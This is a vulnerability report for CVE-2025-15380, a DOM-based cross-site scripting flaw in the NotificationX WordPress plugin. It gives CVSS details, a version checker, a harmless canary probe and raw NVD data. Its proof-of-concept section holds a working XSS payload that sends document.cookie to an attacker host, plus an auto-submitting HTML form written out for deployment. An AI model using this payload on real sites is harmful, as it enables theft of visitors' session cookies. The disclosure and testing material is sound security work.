Security Vulnerability Report
CVE-2025-15380 CVSS 7.2 HIGH

CVE-2025-15380

Published: 2026-01-20 15:16:16
Last Modified: 2026-04-15 00:35:42

Description

The NotificationX – FOMO, Live Sales Notification, WooCommerce Sales Popup, GDPR, Social Proof, Announcement Banner & Floating Notification Bar plugin for WordPress is vulnerable to DOM-Based Cross-Site Scripting via the 'nx-preview' POST parameter in all versions up to, and including, 3.2.0. This is due to insufficient input sanitization and output escaping when processing preview data. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute when a user visits a malicious page that auto-submits a form to the vulnerable site.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Caveat: this vector scores User Interaction as None, yet the attack path in the description requires a victim to visit an attacker-controlled page that auto-submits the form to the vulnerable site. With UI:R and the other metrics unchanged, the CVSS 3.1 base score would be 6.1 (MEDIUM). Treat 7.2 as the reporting source's rating, not a re-scored one.

Configurations (Affected Products)

No CPE configuration data available.

NotificationX plugin for WordPress, all versions up to and including 3.2.0 (the affected range stated in the description above).
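To check whether a given install falls inside that range, here is an added example (not part of the advisory, and not code from the plugin): it reads the version from a WordPress plugin header, either the `Version:` line of the plugin's main PHP file or `Stable tag:` from readme.txt, and compares it component-wise against 3.2.0 so that 3.10.x is correctly treated as newer than 3.2.0. The header and readme text below are constructed samples; the main-file path in the comment is an assumption.

```python
import re

# Affected range from the advisory: every version up to and including 3.2.0.
LAST_AFFECTED = "3.2.0"

# Constructed sample of a WordPress plugin header block (not copied from the
# real plugin file); the field names are the standard WordPress header keys.
SAMPLE_PLUGIN_HEADER = """<?php
/**
 * Plugin Name: NotificationX
 * Plugin URI:  https://notificationx.com
 * Description: Example header block constructed for this check.
 * Version:     3.10.1
 * Author:      WPDeveloper
 */
"""

# Constructed sample of the readme.txt fields WordPress.org publishes.
SAMPLE_README = """=== NotificationX ===
Contributors: wpdevteam
Requires at least: 5.0
Tested up to: 6.7
Stable tag: 3.2.0
License: GPLv3
"""


def version_tuple(version):
    """'3.10.1' -> (3, 10, 1). Numeric, so 3.10.1 sorts after 3.2.0; a plain
    string comparison gets that wrong ('3.10.1' < '3.2.0' is True)."""
    parts = re.findall(r"\d+", version)
    if not parts:
        raise ValueError(f"no numeric version component in {version!r}")
    return tuple(int(p) for p in parts)


def parse_plugin_version(main_file_text):
    """Read the 'Version:' header from a plugin's main PHP file."""
    m = re.search(r"^\s*\*?\s*Version:\s*(\S+)", main_file_text,
                  re.MULTILINE | re.IGNORECASE)
    return m.group(1) if m else None


def parse_stable_tag(readme_text):
    """Read 'Stable tag:' from readme.txt, the version WordPress.org serves."""
    m = re.search(r"^Stable tag:\s*(\S+)", readme_text,
                  re.MULTILINE | re.IGNORECASE)
    return m.group(1) if m else None


def is_affected(version, last_affected=LAST_AFFECTED):
    """True when version <= last_affected, compared component-wise."""
    return version_tuple(version) <= version_tuple(last_affected)


def assess(main_file_text=None, readme_text=None):
    """Combine both sources; prefer the main-file header when present."""
    version = None
    if main_file_text:
        version = parse_plugin_version(main_file_text)
    if version is None and readme_text:
        version = parse_stable_tag(readme_text)
    if version is None:
        return {"version": None, "affected": None}
    return {"version": version, "affected": is_affected(version)}


if __name__ == "__main__":
    # Typical use: read wp-content/plugins/notificationx/notificationx.php
    # (main-file name is an assumption) or fetch the slug's public readme.txt.
    print(assess(SAMPLE_PLUGIN_HEADER))        # 3.10.1 -> not affected
    print(assess(readme_text=SAMPLE_README))   # 3.2.0  -> affected
```

On a live site the readme.txt is usually fetchable unauthenticated at /wp-content/plugins/notificationx/readme.txt, which makes this check usable from the outside as well as from the server.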

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import base64
import html

import requests

# CVE-2025-15380 PoC - NotificationX XSS via the 'nx-preview' POST parameter
# (all versions <= 3.2.0). The admin-ajax.php endpoint and the
# 'notificationx_preview' action name used below are this PoC's assumptions;
# the advisory itself only names the 'nx-preview' POST parameter.

# Target URL with vulnerable NotificationX plugin
target_url = "http://target-site.com/wp-admin/admin-ajax.php"

# Malicious JavaScript payload
malicious_script = (
    "<script>document.location='https://attacker.com/steal?cookie='"
    "+document.cookie</script>"
)

# Encode the payload for the nx-preview parameter
encoded_payload = base64.b64encode(malicious_script.encode()).decode()

# Prepare the exploit request
data = {
    'action': 'notificationx_preview',
    'nx-preview': encoded_payload,
    'nonce': 'attacker_controlled',  # May not be required for all configurations
}

# Alternative: direct injection without encoding
direct_payload = malicious_script

# Auto-submit form HTML for social engineering. Attribute values are
# entity-escaped so the browser decodes them back to the raw payload on submit.
html_form = f'''<html>
<body>
<form id="exploitForm" action="{html.escape(target_url, quote=True)}" method="POST">
  <input type="hidden" name="action" value="notificationx_preview">
  <input type="hidden" name="nx-preview" value="{html.escape(direct_payload, quote=True)}">
</form>
<script>
// Auto-submit form when page loads
document.getElementById('exploitForm').submit();
</script>
</body>
</html>
'''

# Send the exploit request
response = requests.post(target_url, data=data, allow_redirects=False, timeout=10)
print(f"Status: {response.status_code}")
print(f"Response: {response.text[:500]}")

# Save the HTML form for deployment
with open('exploit.html', 'w', encoding='utf-8') as f:
    f.write(html_form)
print("Exploit HTML saved to exploit.html")
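As a non-destructive alternative to the cookie-stealing PoC above, the added example below (not from the advisory or the plugin) submits a harmless canary in the 'nx-preview' parameter and classifies how the response echoes it: verbatim in an HTML body (the insufficient output escaping the advisory describes), verbatim inside a JSON body (only exploitable if the page's JavaScript later writes it into the DOM unescaped, which is the DOM-based angle), entity-escaped (the behaviour a fix should show), or not at all. The endpoint and action name in `probe()` mirror the PoC and are assumptions; the response bodies are constructed samples, not captures from a real site.

```python
import re
import secrets

# Constructed sample responses (not captured from any real site), using a
# fixed canary so the classification is reproducible.
FIXED_CANARY = "<nxcdeadbeef>\"'"
SAMPLE_VULNERABLE_HTML = '<div class="nx-preview"><nxcdeadbeef>"\'</div>'
SAMPLE_ESCAPED_HTML = '<div class="nx-preview">&lt;nxcdeadbeef&gt;&quot;&#039;</div>'
SAMPLE_JSON_REFLECTION = '{"success":true,"data":{"html":"<nxcdeadbeef>\\"\'"}}'
SAMPLE_UNRELATED = '{"success":false,"data":"invalid request"}'


def make_canary():
    """Unique marker wrapped in the characters a correct escaper must encode."""
    return f"<nxc{secrets.token_hex(4)}>\"'"


def classify_reflection(body, canary, content_type="text/html"):
    """How does `body` echo `canary`?

    'unescaped'      raw <marker> came back in an HTML body: injectable
    'unescaped-json' raw <marker> came back inside a JSON body: exploitable
                     only if client-side code inserts it into the DOM unescaped
    'escaped'        marker came back, but < > " ' were entity-encoded
    'absent'         marker was not reflected at all
    """
    m = re.search(r"nxc[0-9a-f]{8}", canary)
    if m is None:
        raise ValueError("canary must come from make_canary()")
    token = m.group(0)
    if f"<{token}>" in body:
        return "unescaped-json" if "json" in content_type.lower() else "unescaped"
    if token in body:
        # Any entity variant (&lt; / &#60;, &#039; / &#x27;) lands here.
        return "escaped"
    return "absent"


def probe(url, param="nx-preview", action="notificationx_preview", timeout=10):
    """POST a fresh canary to `url` and classify its reflection.
    Endpoint and action defaults mirror the PoC above and are assumptions."""
    import requests  # optional dependency, only needed for a live probe

    canary = make_canary()
    resp = requests.post(url, data={"action": action, param: canary},
                         timeout=timeout, allow_redirects=False)
    ctype = resp.headers.get("Content-Type", "")
    return classify_reflection(resp.text, canary, ctype), resp.status_code, ctype


if __name__ == "__main__":
    for name, body, ctype in [
        ("vulnerable html", SAMPLE_VULNERABLE_HTML, "text/html"),
        ("escaped html", SAMPLE_ESCAPED_HTML, "text/html"),
        ("json reflection", SAMPLE_JSON_REFLECTION, "application/json"),
        ("unrelated", SAMPLE_UNRELATED, "application/json"),
    ]:
        print(f"{name:16s} -> {classify_reflection(body, FIXED_CANARY, ctype)}")
    # Live check against an authorised target:
    # print(probe("http://target-site.com/wp-admin/admin-ajax.php"))
```

The canary deliberately contains `<`, `>`, `"` and `'` because a fix that escapes only `<` and `>` still leaves attribute-context injection open; seeing all four come back as entities is the result to look for after updating past 3.2.0.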

References

https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3433555%40notificationx&old=3426659%40notificationx&sfp_email=&sfph_mail= (plugin changeset on WordPress.org Trac)
https://research.cleantalk.org/cve-2025-15380/ (CleanTalk research write-up)
https://www.wordfence.com/threat-intel/vulnerabilities/id/9ca12315-380b-4251-b637-4e9d29df35e0?source=cve (Wordfence Threat Intelligence entry)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-15380",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-20T15:16:15.767",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The NotificationX – FOMO, Live Sales Notification, WooCommerce Sales Popup, GDPR, Social Proof, Announcement Banner & Floating Notification Bar plugin for WordPress is vulnerable to DOM-Based Cross-Site Scripting via the 'nx-preview' POST parameter in all versions up to, and including, 3.2.0. This is due to insufficient input sanitization and output escaping when processing preview data. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute when a user visits a malicious page that auto-submits a form to the vulnerable site."
      },
      {
        "lang": "es",
        "value": "El plugin NotificationX – FOMO, Live Sales Notification, WooCommerce Sales Popup, GDPR, Social Proof, Announcement Banner &amp; Floating Notification Bar para WordPress es vulnerable a cross-site scripting basado en DOM a través del parámetro POST 'nx-preview' en todas las versiones hasta e incluyendo la 3.2.0. Esto se debe a una insuficiente sanitización de entrada y escape de salida al procesar datos de vista previa. Esto hace posible que atacantes no autenticados inyecten scripts web arbitrarios en páginas que se ejecutan cuando un usuario visita una página maliciosa que envía automáticamente un formulario al sitio vulnerable."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3433555%40notificationx&old=3426659%40notificationx&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://research.cleantalk.org/cve-2025-15380/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9ca12315-380b-4251-b637-4e9d29df35e0?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}